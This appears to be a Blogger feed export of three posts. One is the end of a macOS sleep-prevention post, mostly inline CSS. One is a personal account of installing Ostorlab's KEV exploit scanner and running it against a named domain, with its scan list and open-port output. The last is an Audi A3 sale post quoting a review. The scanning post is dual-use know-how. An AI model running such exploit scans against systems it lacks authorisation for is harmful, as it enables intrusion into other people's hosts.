var(--theme-primary-300); --theme-button-selected-color: var(--theme-primary-600); --theme-content-background-color: var(--white); --theme-content-border-color: var(--black-225); --theme-footer-background-border-top: 0; --theme-footer-background-color: transparent; --theme-footer-background-position: top left; --theme-footer-background-repeat: no-repeat; --theme-footer-background-size: auto; --theme-footer-divider-color: hsl(210,8%,85%); --theme-footer-link-caret-color: hsl(0,0%,100%); --theme-footer-link-color-active: hsl(210,8%,5%); --theme-footer-link-color-hover: hsl(210,8%,5%); --theme-footer-link-color: hsl(210,8%,25%); --theme-footer-padding-bottom: 0; --theme-footer-padding-top: 0; --theme-footer-text-color: hsl(210,8%,42%); --theme-footer-title-color: hsl(0,0%,0%); --theme-header-background-border-bottom: 0; --theme-header-background-color: transparent; --theme-header-background-position: left top; --theme-header-background-repeat: repeat-x; --theme-header-background-size: auto; --theme-header-foreground-color: transparent; --theme-header-foreground-position: bottom right; --theme-header-foreground-repeat: no-repeat; --theme-header-foreground-size: auto; --theme-header-link-color: var(--theme-primary); --theme-header-sponsored-color: hsla(0,0%,0%,0.6); --theme-link-color-hover: #0aa8ff; --theme-link-color-visited: rgba(0,138,214,0.8); --theme-link-color: #008AD6; --theme-post-body-font-family: var(--ff-sans); --theme-post-owner-background-color: var(--theme-primary-100); --theme-post-owner-new-background-color: var(--theme-primary-200); --theme-post-title-color-hover: var(--theme-link-color-hover); --theme-post-title-color-visited: var(--theme-link-color-visited); --theme-post-title-color: var(--theme-link-color); --theme-post-title-font-family: var(--ff-sans); --theme-primary-custom-100: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .9))); --theme-primary-custom-200: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .75))); --theme-primary-custom-300: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .5))); --theme-primary-custom-400: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), var(--theme-base-primary-color-l)); --theme-primary-custom-500: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.3))); --theme-primary-custom-600: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.6))); --theme-primary-custom: var(--theme-primary-custom-400); --theme-tag-background-color: var(--theme-secondary-100); --theme-tag-border-color: transparent; --theme-tag-color: var(--theme-secondary-500); --theme-tag-hover-background-color: var(--theme-secondary-200); --theme-tag-hover-border-color: transparent; --theme-tag-hover-color: var(--theme-secondary-600); --theme-tag-required-background-color: var(--theme-secondary-500); --theme-tag-required-border-color: transparent; --theme-tag-required-color: var(--white); --theme-tag-required-hover-background-color: var(--theme-secondary-400); --theme-tag-required-hover-border-color: transparent; --theme-tag-required-hover-color: var(--white); --theme-topbar-bottom-border: none; border: 0px; box-sizing: inherit; font-family: inherit; font-feature-settings: inherit; font-kerning: inherit; font-optical-sizing: inherit; font-size: var(--_pr-code-fs); font-stretch: inherit; font-style: inherit; font-variant: inherit; font-variation-settings: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline; white-space: inherit;">Install the Adrenaline to prevent macOS from sleeping</code></pre><pre class="lang-bash s-code-block" style="--_cb-line-numbers-bg: var(--black-150); --theme-background-attachment: auto; --theme-background-color: #F1F2F3; --theme-background-position: top left; --theme-background-repeat: repeat; --theme-background-size: auto; --theme-base-primary-color-h: 201.30841121; --theme-base-primary-color-l: 41.96078431%; --theme-base-primary-color-s: 100%; --theme-body-font-color: var(--black-600); --theme-body-font-family: var(--ff-sans); --theme-button-active-background-color: var(--theme-primary-200); --theme-button-color: var(--theme-primary); --theme-button-hover-background-color: var(--theme-primary-100); --theme-button-hover-color: var(--theme-primary-400); --theme-button-outlined-border-color: var(--theme-primary-400); --theme-button-outlined-selected-border-color: var(--theme-primary-500); --theme-button-primary-active-background-color: var(--theme-primary-600); --theme-button-primary-active-color: var(--white); --theme-button-primary-background-color: var(--theme-primary-400); --theme-button-primary-color: var(--white); --theme-button-primary-hover-background-color: var(--theme-primary-500); --theme-button-primary-hover-color: var(--white); --theme-button-primary-selected-background-color: var(--theme-primary-600); --theme-button-primary-selected-color: var(--white); --theme-button-selected-background-color: var(--theme-primary-300); --theme-button-selected-color: var(--theme-primary-600); --theme-content-background-color: var(--white); --theme-content-border-color: var(--black-225); --theme-footer-background-border-top: 0; --theme-footer-background-color: transparent; --theme-footer-background-position: top left; --theme-footer-background-repeat: no-repeat; --theme-footer-background-size: auto; --theme-footer-divider-color: hsl(210,8%,85%); --theme-footer-link-caret-color: hsl(0,0%,100%); --theme-footer-link-color-active: hsl(210,8%,5%); --theme-footer-link-color-hover: hsl(210,8%,5%); --theme-footer-link-color: hsl(210,8%,25%); --theme-footer-padding-bottom: 0; --theme-footer-padding-top: 0; --theme-footer-text-color: hsl(210,8%,42%); --theme-footer-title-color: hsl(0,0%,0%); --theme-header-background-border-bottom: 0; --theme-header-background-color: transparent; --theme-header-background-position: left top; --theme-header-background-repeat: repeat-x; --theme-header-background-size: auto; --theme-header-foreground-color: transparent; --theme-header-foreground-position: bottom right; --theme-header-foreground-repeat: no-repeat; --theme-header-foreground-size: auto; --theme-header-link-color: var(--theme-primary); --theme-header-sponsored-color: hsla(0,0%,0%,0.6); --theme-link-color-hover: #0aa8ff; --theme-link-color-visited: rgba(0,138,214,0.8); --theme-link-color: #008AD6; --theme-post-body-font-family: var(--ff-sans); --theme-post-owner-background-color: var(--theme-primary-100); --theme-post-owner-new-background-color: var(--theme-primary-200); --theme-post-title-color-hover: var(--theme-link-color-hover); --theme-post-title-color-visited: var(--theme-link-color-visited); --theme-post-title-color: var(--theme-link-color); --theme-post-title-font-family: var(--ff-sans); --theme-primary-custom-100: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .9))); --theme-primary-custom-200: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .75))); --theme-primary-custom-300: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .5))); --theme-primary-custom-400: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), var(--theme-base-primary-color-l)); --theme-primary-custom-500: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.3))); --theme-primary-custom-600: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.6))); --theme-primary-custom: var(--theme-primary-custom-400); --theme-tag-background-color: var(--theme-secondary-100); --theme-tag-border-color: transparent; --theme-tag-color: var(--theme-secondary-500); --theme-tag-hover-background-color: var(--theme-secondary-200); --theme-tag-hover-border-color: transparent; --theme-tag-hover-color: var(--theme-secondary-600); --theme-tag-required-background-color: var(--theme-secondary-500); --theme-tag-required-border-color: transparent; --theme-tag-required-color: var(--white); --theme-tag-required-hover-background-color: var(--theme-secondary-400); --theme-tag-required-hover-border-color: transparent; --theme-tag-required-hover-color: var(--white); --theme-topbar-bottom-border: none; border-radius: var(--br-md); border: 0px; box-sizing: inherit; color: #0c0d0e; font-family: var(--ff-mono); font-feature-settings: inherit; font-kerning: inherit; font-optical-sizing: inherit; font-size: var(--fs-body1); font-stretch: inherit; font-variant-alternates: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; font-variant-position: inherit; font-variation-settings: inherit; line-height: var(--lh-md); margin-bottom: 0px; margin-top: 0px; max-height: 600px; overflow-wrap: normal; overflow: auto; padding: var(--su12); vertical-align: baseline; width: auto;"><code class="hljs language-bash" style="--theme-background-attachment: auto; --theme-background-color: #F1F2F3; --theme-background-position: top left; --theme-background-repeat: repeat; --theme-background-size: auto; --theme-base-primary-color-h: 201.30841121; --theme-base-primary-color-l: 41.96078431%; --theme-base-primary-color-s: 100%; --theme-body-font-color: var(--black-600); --theme-body-font-family: var(--ff-sans); --theme-button-active-background-color: var(--theme-primary-200); --theme-button-color: var(--theme-primary); --theme-button-hover-background-color: var(--theme-primary-100); --theme-button-hover-color: var(--theme-primary-400); --theme-button-outlined-border-color: var(--theme-primary-400); --theme-button-outlined-selected-border-color: var(--theme-primary-500); --theme-button-primary-active-background-color: var(--theme-primary-600); --theme-button-primary-active-color: var(--white); --theme-button-primary-background-color: var(--theme-primary-400); --theme-button-primary-color: var(--white); --theme-button-primary-hover-background-color: var(--theme-primary-500); --theme-button-primary-hover-color: var(--white); --theme-button-primary-selected-background-color: var(--theme-primary-600); --theme-button-primary-selected-color: var(--white); --theme-button-selected-background-color: var(--theme-primary-300); --theme-button-selected-color: var(--theme-primary-600); --theme-content-background-color: var(--white); --theme-content-border-color: var(--black-225); --theme-footer-background-border-top: 0; --theme-footer-background-color: transparent; --theme-footer-background-position: top left; --theme-footer-background-repeat: no-repeat; --theme-footer-background-size: auto; --theme-footer-divider-color: hsl(210,8%,85%); --theme-footer-link-caret-color: hsl(0,0%,100%); --theme-footer-link-color-active: hsl(210,8%,5%); --theme-footer-link-color-hover: hsl(210,8%,5%); --theme-footer-link-color: hsl(210,8%,25%); --theme-footer-padding-bottom: 0; --theme-footer-padding-top: 0; --theme-footer-text-color: hsl(210,8%,42%); --theme-footer-title-color: hsl(0,0%,0%); --theme-header-background-border-bottom: 0; --theme-header-background-color: transparent; --theme-header-background-position: left top; --theme-header-background-repeat: repeat-x; --theme-header-background-size: auto; --theme-header-foreground-color: transparent; --theme-header-foreground-position: bottom right; --theme-header-foreground-repeat: no-repeat; --theme-header-foreground-size: auto; --theme-header-link-color: var(--theme-primary); --theme-header-sponsored-color: hsla(0,0%,0%,0.6); --theme-link-color-hover: #0aa8ff; --theme-link-color-visited: rgba(0,138,214,0.8); --theme-link-color: #008AD6; --theme-post-body-font-family: var(--ff-sans); --theme-post-owner-background-color: var(--theme-primary-100); --theme-post-owner-new-background-color: var(--theme-primary-200); --theme-post-title-color-hover: var(--theme-link-color-hover); --theme-post-title-color-visited: var(--theme-link-color-visited); --theme-post-title-color: var(--theme-link-color); --theme-post-title-font-family: var(--ff-sans); --theme-primary-custom-100: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .9))); --theme-primary-custom-200: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .75))); --theme-primary-custom-300: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .5))); --theme-primary-custom-400: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), var(--theme-base-primary-color-l)); --theme-primary-custom-500: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.3))); --theme-primary-custom-600: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.6))); --theme-primary-custom: var(--theme-primary-custom-400); --theme-tag-background-color: var(--theme-secondary-100); --theme-tag-border-color: transparent; --theme-tag-color: var(--theme-secondary-500); --theme-tag-hover-background-color: var(--theme-secondary-200); --theme-tag-hover-border-color: transparent; --theme-tag-hover-color: var(--theme-secondary-600); --theme-tag-required-background-color: var(--theme-secondary-500); --theme-tag-required-border-color: transparent; --theme-tag-required-color: var(--white); --theme-tag-required-hover-background-color: var(--theme-secondary-400); --theme-tag-required-hover-border-color: transparent; --theme-tag-required-hover-color: var(--white); --theme-topbar-bottom-border: none; border: 0px; box-sizing: inherit; font-family: inherit; font-feature-settings: inherit; font-kerning: inherit; font-optical-sizing: inherit; font-size: var(--_pr-code-fs); font-stretch: inherit; font-style: inherit; font-variant: inherit; font-variation-settings: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline; white-space: inherit;"><br /></code></pre><p><span face="-apple-system, "system-ui", "Segoe UI Adjusted", "Segoe UI", "Liberation Sans", sans-serif" style="background-color: white; color: #0c0d0e; font-size: 15px;"><br /></span></p>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-4228308309083455522024-01-23T01:49:00.000-08:002024-03-02T02:08:07.450-08:00Scanning for Known Exploitable Vulnerabilities (KEV) <p>KEV</p><p>Known Exploitable Vulnerabilities is a project is dedicated to automate the detection of known exploited vulnerabilities through a single command, it includes exploits for vulnerabilities from:</p><p></p><ul style="text-align: left;"><li>Known Exploited Vulnerabilities Catalog by CISA</li><li>Tsunami by Google</li><li>Agent Asteroid by Ostorlab</li><li>Bug Bounty Programs</li></ul><p></p><p>In order to be able to get KEV to work and the <b>ostorlab scan run</b> to succeed, I had to </p><p>1. clone the git repo: https://github.com/Ostorlab/KEV</p><p>2. use pip to install ostorlab</p><p>3. install docker</p><p>4. delete an IPv6 address</p><p>5. # --live-restore \ in /etc/sysconfig}/docker</p><p>6. start/restart docker</p><p><br /></p><p>Finally, the docker swarm would start and the scan would start running for days!</p><p><br /></p><p><b>ostorlab scan run --install -g agent_group.yaml domain-name pentest.biz</b></p><p><br /></p><p>It produced a lot of output, and my computer got very busy with 12 docker containers</p><p>running with each having a virtual network interface. Running the following will show </p><p>the status of any scans running:</p><p><br /></p><p><b>ostorlab scan list</b></p><p><br /></p><p>🔸 WARNING: Local runtime ignores scan list pagination</p><p>✔ Scans listed successfully.</p><p> </p><p> Showing 1 Scans </p><p>┌────┬─────────────────┬────────────────────────────┬──────────┐</p><p>│ Id │ Asset │ Created Time │ Progress │</p><p>╞════╪═════════════════╪════════════════════════════╪══════════╡</p><p>│ 1 │ pentest.biz │ 2024-01-19 14:08:24.518675 │ Running │</p><p>└────┴─────────────────┴────────────────────────────┴──────────┘</p><p><br /></p><p><br /></p><p>To see what Known Exploitable Vulnerabilities were present, I ran the following command, but the output never changed after only a </p><p>few hours:</p><p><br /></p><p><b>ostorlab vulnz list -s 1</b></p><p><br /></p><p>Here's the output, which looks redundant, but it shows different hosts and ports they had open. Surprising somewhat to me that </p><p>having that many ports open would not expose some kind of vulnerability, but kudos to the hosting provider for that. </p><p><br /></p><p><br /></p><p>🔹 Fetching vulnerabilities for scan 1</p><p> </p><p> Scan 1: Found 13 vulnerabilities. </p><p>┌────┬───────────────────┬─────────────────────────────────────────────────────────────────────┬─────────────┬────────────────┬──────────────────────────────────────────────────────────────────────┐</p><p>│ Id │ Title │ Vulnerable target │ Risk rating │ CVSS V3 Vector │ Short Description │</p><p>╞════╪═══════════════════╪═════════════════════════════════════════════════════════════════════╪═════════════╪════════════════╪══════════════════════════════════════════════════════════════════════╡</p><p>│ 1 │ Network Port Scan │ Domain: pentest.biz PORT: 21 │ Info │ │ List of open network ports. │</p><p>│ │ │ PORT: 22 │ │ │ │</p><p>│ │ │ PORT: 25 │ │ │ │</p><p>│ │ │ PORT: 26 │ │ │ │</p><p>│ │ │ PORT: 53 │ │ │ │</p><p>│ │ │ PORT: 80 │ │ │ │</p><p>│ │ │ PORT: 110 │ │ │ │</p><p>│ │ │ PORT: 135 │ │ │ │</p><p>│ │ │ PORT: 139 │ │ │ │</p><p>│ │ │ PORT: 143 │ │ │ │</p><p>│ │ │ PORT: 443 │ │ │ │</p><p>│ │ │ PORT: 445 │ │ │ │</p><p>│ │ │ PORT: 465 │ │ │ │</p><p>│ │ │ PORT: 587 │ │ │ │</p><p>│ │ │ PORT: 993 │ │ │ │</p><p>│ │ │ PORT: 995 │ │ │ │</p><p>│ │ │ PORT: 3306 │ │ │ │</p><p><br /></p><p>All the other hosts for the domain, showed almost identical ports.</p><p><br /></p><p>│ 1 │ Network Port Scan │ Domain: pentest.biz PORT: 21 │ Info │ │ List of open network ports. │</p><p>│ 2 │ Network Port Scan │ Domain: cpcontacts.pentest.biz PORT: 21 │ Info │ │ List of open network ports. │</p><p>│ 3 │ Network Port Scan │ Domain: cpcalendars.pentest.biz PORT: 21 │ Info │ │ List of open network ports. │</p><p>│ 4 │ Network Port Scan │ Domain: mail.pentest.biz PORT: 21 │ Info │ │ List of open network ports. │</p><p>│ 5 │ Network Port Scan │ Domain: autodiscover.pentest.biz PORT: 21 │ Info │ │ List of open network ports. │</p><p>│ 6 │ Network Port Scan │ Domain: webdisk.pentest.biz PORT: 21 │ Info │ │ List of open network ports. │</p><p>│ 7 │ Network Port Scan │ Domain: webmail.pentest.biz PORT: 21 │ Info │ │ List of open network ports. │</p><p>│ 8 │ Network Port Scan │ Domain: cpanel.pentest.biz PORT: 21 │ Info │ │ List of open network ports. │</p><p>│ 9 │ Network Port Scan │ Domain: www.pentest.biz PORT: 21 │ Info │ │ List of open network ports. │</p><p>│ 10 │ Network Port Scan │ Domain: ns3031.hostgator.com PORT: 21 │ Info │ │ List of open network ports. │</p><p>│ 11 │ Network Port Scan │ Domain: localhost.pentest.biz PORT: 5000 │ Info │ │ List of open network ports. │</p><p>│ 12 │ Network Port Scan │ Domain: ftp.pentest.biz PORT: 21 │ Info │ │ List of open network ports. │</p><p>│ 13 │ Network Port Scan │ Domain: ns3032.hostgator.com PORT: 21 │ Info │ │ List of open network ports. │</p>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-12338749425675495822024-01-14T00:21:00.000-08:002024-03-02T02:10:55.337-08:00Audi A3 2.0 TFSI 8P Sportback Premium Plus S-line<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidH7xE0lJvWXJekxS8v1gFvGySvMvthFJw1BalLtf7DVV_njahiK5jO8cyGe44-p1UWvB5dpKKK88JIgC3tAeNMqSudVVtpcArlmG46smCP1qzkCyUO3U6bnBwZ936Csv8SfkC9OkDykjJ3JYdPO9uRg5XiOnbLw16OChzGOfXe-9bgFzh90TB4PTCYWrA/s1920/SON02912.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidH7xE0lJvWXJekxS8v1gFvGySvMvthFJw1BalLtf7DVV_njahiK5jO8cyGe44-p1UWvB5dpKKK88JIgC3tAeNMqSudVVtpcArlmG46smCP1qzkCyUO3U6bnBwZ936Csv8SfkC9OkDykjJ3JYdPO9uRg5XiOnbLw16OChzGOfXe-9bgFzh90TB4PTCYWrA/s320/SON02912.JPG" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxKr-P7Xhsip3PqQ6fL6f7UPFpFYdzXQ_xhuLvE3MwshS13AM-yPS3g-NCgF1oOTGjFhupK0KnHxQgRwSr0rNEZeTfZs_hepDZZnMiRCr-Ufrb5eIfHPpSaiOxr6b7xGnMWj_-IbF99SstgO4C6zmIYoD7nBX4TfJVI0hxvvTt4FXtkYI1TQJNeEV-r9OM/s1920/SON02911.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxKr-P7Xhsip3PqQ6fL6f7UPFpFYdzXQ_xhuLvE3MwshS13AM-yPS3g-NCgF1oOTGjFhupK0KnHxQgRwSr0rNEZeTfZs_hepDZZnMiRCr-Ufrb5eIfHPpSaiOxr6b7xGnMWj_-IbF99SstgO4C6zmIYoD7nBX4TfJVI0hxvvTt4FXtkYI1TQJNeEV-r9OM/s320/SON02911.JPG" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-zCBWtol8hGuJ6DgiHs6EiMM6iYChQ3w9SgyP9I1Ih2To7vaZwQ6qQI-JVexOWX4V1sj1l__noMHw_KmJQksXlXiBuvan6OfYUyQjyXWUzrFPUS9VnO8CIHUA7NCvIALO_QmtC8P0wbpsV3JEAtrYKy8cSvuxis9Ad96TYqyEJYNlzL5c8p3tIqvNeZ_n/s1920/SON02910.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-zCBWtol8hGuJ6DgiHs6EiMM6iYChQ3w9SgyP9I1Ih2To7vaZwQ6qQI-JVexOWX4V1sj1l__noMHw_KmJQksXlXiBuvan6OfYUyQjyXWUzrFPUS9VnO8CIHUA7NCvIALO_QmtC8P0wbpsV3JEAtrYKy8cSvuxis9Ad96TYqyEJYNlzL5c8p3tIqvNeZ_n/s320/SON02910.JPG" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwXjfczCqr6nWZc5YJJbAJe7qxlnSoffEBQjcfLreydKwAO5gVMz4o6Gu0hQ83Mjpp8SDi1aoTmqKfp_nfwPqO8z4Q3aX9YybEjRuWsQj6n1xcumAqRJSTrPCxUBvu1nxSqgdk1g5NygRE72IZNe9cA-plfYA6T3tJdmkg65niGmytVL-U3eUKAKds6CkK/s1920/SON02908.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwXjfczCqr6nWZc5YJJbAJe7qxlnSoffEBQjcfLreydKwAO5gVMz4o6Gu0hQ83Mjpp8SDi1aoTmqKfp_nfwPqO8z4Q3aX9YybEjRuWsQj6n1xcumAqRJSTrPCxUBvu1nxSqgdk1g5NygRE72IZNe9cA-plfYA6T3tJdmkg65niGmytVL-U3eUKAKds6CkK/s320/SON02908.JPG" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_s4OKFbVhUKOZ4HSj9NpOOfJ9HyFVHlG0zm5JCRaoy9p5b4Xon1EpEH_KnuSjZvZuXHbmbN5Uzov7zblCkLhIb8CneurYVNodcHjL3KGqhh1H6aO_qD_8CeeDhgfBJb6M_KMRFnCCjbovjKUPOi6ruyL1b1DadqtSpPNUUbWZAKJlJzL4yx7pnJPtTdnD/s1920/SON02907.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_s4OKFbVhUKOZ4HSj9NpOOfJ9HyFVHlG0zm5JCRaoy9p5b4Xon1EpEH_KnuSjZvZuXHbmbN5Uzov7zblCkLhIb8CneurYVNodcHjL3KGqhh1H6aO_qD_8CeeDhgfBJb6M_KMRFnCCjbovjKUPOi6ruyL1b1DadqtSpPNUUbWZAKJlJzL4yx7pnJPtTdnD/s320/SON02907.JPG" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtogXPPYcxSmtWhmJE8F-Y5ip32ODeKbd_YPVq6czMs9tRvwwpKBlRIFgPkZ8p47qRpwwzPnoSzh0DnbJ_lvmTDGCNp9W3AvPZ3djfxY3iaU44EdZ9DYa31BeE6zzBzwCwb2Xfk2Wz0lwV62RqMvtkDTstAMVL90AD01DcYB2v6Q7Mc1xByEujnJvE032W/s2719/20240118_175614-sale-sticker.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1593" data-original-width="2719" height="374" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtogXPPYcxSmtWhmJE8F-Y5ip32ODeKbd_YPVq6czMs9tRvwwpKBlRIFgPkZ8p47qRpwwzPnoSzh0DnbJ_lvmTDGCNp9W3AvPZ3djfxY3iaU44EdZ9DYa31BeE6zzBzwCwb2Xfk2Wz0lwV62RqMvtkDTstAMVL90AD01DcYB2v6Q7Mc1xByEujnJvE032W/w640-h374/20240118_175614-sale-sticker.jpg" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div>From <a href="https://www.autoblog.com/buy/2012-Audi-A3/review/">https://www.autoblog.com/buy/2012-Audi-A3/review/</a>:<p></p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p> <span face=""Roboto Condensed", "Arial Narrow", "Helvetica Neue", Helvetica, Arial, sans-serif" style="color: #545659; font-size: 14px;">The 2011 Audi A3 2.0 TFSI ($27,270), <b>2.0 TFSI S tronic ($28,750)</b>, 2.0 TDI S tronic ($30,250) and 2.0 TFSI quattro ($30,850) come with leather upholstery; dual-zone automatic climate control; power lumbar support; tilt and telescoping steering column; 10-speaker, 140-watt stereo; central locking with remote keyless entry; power windows/locks/mirrors; electronic crui1rse control; anti-theft alarm; trip computer; vanity mirrors; and five-spoke alloy wheels with 225/45-17 all-season radial tires. </span></p><p style="box-sizing: border-box; color: #545659; font-family: "Roboto Condensed", "Arial Narrow", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px;">The <b>Premium Plus Package ($2,000)</b> adds unique wheels, a storage package, illumination package, power front driver's seat with four-way power lumbar adjustment, multifunction three-spoke sport steering wheel (with alloy shift paddles on S tronic), bi-Xenon headlamps and LED daytime running lamps, Bluetooth, and aluminum cabin trim. </p><p style="box-sizing: border-box; color: #545659; font-family: "Roboto Condensed", "Arial Narrow", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px;">The 2.0 TFSI turbo engine's 200 horsepower is underscored by 207 pound-feet of torque, the latter delivered across a wide sweep of the tach needle from 1800 to 5000 rpm, making the two-liter feel as though it had a bunch more cubic inches grafted onto it somewhere. Yet, it's remarkably easy on fuel, with EPA city/highway estimates of 21/30 mpg with the manual transmission and 22/28 with the S tronic automatic. </p><p style="box-sizing: border-box; color: #545659; font-family: "Roboto Condensed", "Arial Narrow", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px;">There's little turbo lag, and the engine revs smoothly yet quickly through its powerband. Just push your right foot down and let the 2.0T deliver. Audi says the A3 2.0T sprints from zero to 60 mph in 6.7 seconds, but the raw number doesn't begin to do justice to the engine's throttle response and the chassis' willingness to get from here to there. Torque is ever ready, and the engine is quite happy to reach 6000 rpm over and over again.</p></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p style="box-sizing: border-box; color: #545659; font-family: "Roboto Condensed", "Arial Narrow", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px;">The transmission choices illustrate Audi's industry-leading technology in transforming engine torque into rolling power. You can't go wrong with either the standard 6-speed manual or the paddle/lever-shifted S tronic automatic. The swiftness of choosing the correct gear with the S tronic feels like magic and makes every driver almost feel like an accomplished race car driver. </p><p style="box-sizing: border-box; color: #545659; font-family: "Roboto Condensed", "Arial Narrow", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px;">Surefooted agility, even with only the two front wheels driving the car, comes easily to the A3, thanks in large measure to its four-link rear suspension. Compactness, low weight and superior handling are all expected benefits of such a refined suspension. The multiple links result in better lateral rigidity for crisper handling and a comfortable ride. It's very good, and is one hallmark of an engineering department at full strength. </p><p><span face=""Roboto Condensed", "Arial Narrow", "Helvetica Neue", Helvetica, Arial, sans-serif" style="color: #545659; font-size: 14px;">Braking is excellent. The four-wheel discs are big enough to handle repeated pedal stabs without overheating, and high-tech electronics ensure optimum braking in all conditions. The latest-generation ABS features a dual-rate servo, which amplifies brake force when it senses the driver's right-footed demand for emergency stopping power. The newest available electronic stability control guides the car's dynamics with astonishing computer power, integrating the functions of the ABS, EBD (electronic brake-force distribution), ASR (traction control system), MSR (engine drag torque control system), EDL (electronic differential lock), hydraulic brake assist and the ESBS (extended stability braking system). </span> </p></blockquote><p style="text-align: center;"> <span style="font-family: courier; font-size: x-large;">8PA5YX</span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-Ff2wKxX2JhDTLYL7xpKG_Ya5U7LQFuuS1CxQRWjfNkB1OGxWyPeqk-zbFyq2HWiOu25Utx6drjVgISD_aq3goJKhAzMHiSVbuJR52XSve2rsCKR0JzMXFV6EYxWwxjoVOlmIpf640tsje1-EkebNZuapRv0ZL3ZN6LFmuZJFmuaZNwsd4jxwxTBd32ih/s1584/audi-first-lens-andy.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="630" data-original-width="1584" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-Ff2wKxX2JhDTLYL7xpKG_Ya5U7LQFuuS1CxQRWjfNkB1OGxWyPeqk-zbFyq2HWiOu25Utx6drjVgISD_aq3goJKhAzMHiSVbuJR52XSve2rsCKR0JzMXFV6EYxWwxjoVOlmIpf640tsje1-EkebNZuapRv0ZL3ZN6LFmuZJFmuaZNwsd4jxwxTBd32ih/w558-h222/audi-first-lens-andy.jpg" width="558" /></a></div><br /><p></p><a href="https://en.wikipedia.org/wiki/Audi_A3">https://en.wikipedia.org/wiki/Audi_A3</a>:<div><br 